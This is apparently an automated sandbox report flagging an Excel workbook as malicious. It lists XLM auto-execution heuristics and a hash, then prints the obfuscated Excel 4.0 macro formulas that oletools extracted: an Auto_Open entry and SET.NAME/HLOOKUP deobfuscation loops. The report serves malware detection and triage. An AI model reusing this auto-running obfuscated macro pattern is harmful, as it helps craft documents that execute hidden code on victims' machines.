Verdict: MALICIOUS
Risk Score: 140
Heuristics: 3
- Excel 4.0 Auto_Open defined name (critical, OLE_XLM_AUTOOPEN_DEFINEDNAME): oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
- XLM Auto_Open with dangerous formula APIs (critical, OLE_XLM_DANGEROUS_FN): Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
- Excel 4.0 (XLM) macro sheet present (medium, OLE_XLM_AUTOOPEN): Workbook contains an Excel 4.0 macro sheet sub-stream; XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts: 1
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6622 bytes |

SHA-256: c63661f5d83a5aec3a460824fbf9e71f945680271cecedd55f42a773d1087b43

Preview script: first 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - Pfla
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!B176
' 0018 27 LABEL : Cell Value, String Constant - BaBdAtfUczGc len=0
' 0018 26 LABEL : Cell Value, String Constant - bRtbHmCYeCU len=0
' 0018 20 LABEL : Cell Value, String Constant - CMmXT len=0
' 0018 26 LABEL : Cell Value, String Constant - DZmxxZGMOgI len=0
' 0018 21 LABEL : Cell Value, String Constant - FnmwbC len=0
' 0018 25 LABEL : Cell Value, String Constant - HgnnopMHhf len=0
' 0018 21 LABEL : Cell Value, String Constant - HqKhqY len=0
' 0018 27 LABEL : Cell Value, String Constant - KhYMGQKwUTrn len=0
' 0018 20 LABEL : Cell Value, String Constant - lFwXN len=0
' 0018 25 LABEL : Cell Value, String Constant - NbsvaJGEXH len=0
' 0018 22 LABEL : Cell Value, String Constant - RtmtPSM len=0
' 0018 24 LABEL : Cell Value, String Constant - SHqnuisIl len=0
' 0018 22 LABEL : Cell Value, String Constant - SZUSsDE len=0
' 0018 26 LABEL : Cell Value, String Constant - ThDNXdMthHD len=0
' 0018 26 LABEL : Cell Value, String Constant - TmNIlvjeeGG len=0
' 0018 27 LABEL : Cell Value, String Constant - VbazTtSiaXow len=0
' 0018 26 LABEL : Cell Value, String Constant - VnYUcgFQXyo len=0
' 0018 23 LABEL : Cell Value, String Constant - wOEGteOy len=0
' 0018 25 LABEL : Cell Value, String Constant - YSIiIQutRN len=0
' 0018 23 LABEL : Cell Value, String Constant - ZtlRsGGG len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' Pfla,Q41,"",854.00000000000000000000
' Pfla,Q42,"",-463.00000000000000000000
' Pfla,Q43,"",-674.00000000000000000000
' Pfla,Q44,"",3.00000000000000000000
' Pfla,Q45,"",-962.00000000000000000000
' Pfla,Q46,"",-351.00000000000000000000
' Pfla,B92,"SET.NAME("ThDNXdMthHD",0+VALUE("0"))",""
' Pfla,B96,"SET.NAME("FnmwbC",ThDNXdMthHD)",""
' Pfla,B99,"SET.NAME("HgnnopMHhf",ThDNXdMthHD)",""
' Pfla,B102,"SET.NAME("ZtlRsGGG",COUNTA(SHqnuisIl))",""
' Pfla,B105,"SET.NAME("KhYMGQKwUTrn",COUNTA(HqKhqY))",""
' Pfla,B108,[],""
' Pfla,B110,"SET.NAME("VnYUcgFQXyo","")",""
' Pfla,B113,"FnmwbC",""
' Pfla,B116,"SET.NAME("SZUSsDE",HLOOKUP("*",SHqnuisIl,FnmwbC,FALSE))",""
' Pfla,B121,"TmNIlvjeeGG",""
' Pfla,B125,"SET.NAME("RtmtPSM",ThDNXdMthHD)",""
' Pfla,B127,[],""
' Pfla,B129,"RtmtPSM",""
' Pfla,B132,"wOEGteOy",""
' Pfla,B136,"YSIiIQutRN",""
' Pfla,B138,"bRtbHmCYeCU",""
' Pfla,B142,"SET.NAME("lFwXN",VALUE(HLOOKUP("*",HqKhqY,bRtbHmCYeCU,FALSE)))",""
' Pfla,B144,"NbsvaJGEXH",""
' Pfla,B149,"VnYUcgFQXyo",""
' Pfla,B154,"HgnnopMHhf",""
' Pfla,B156,NEXT(),""
' Pfla,B159,"BaBdAtfUczGc",""
' Pfla,B162,[],""
' Pfla,B165,"CMmXT",""
' Pfla,B167,NEXT(),""
' Pfla,B172,RETURN(),""
' Pfla,B205,"SET.NAME("DZmxxZGMOgI",B92)",""
' Pfla,B208,"SHqnuisIl",""
' Pfla,B212,"SET.NAME("HqKhqY",R80C15)",""
' Pfla,B217,"SET.NAME("CMmXT",223)",""
' Pfla,B220,"SET.NAME("VbazTtSiaXow",2)",""
' Pfla,B222,DZmxxZGMOgI(),""
' Pfla,B223,HALT(),""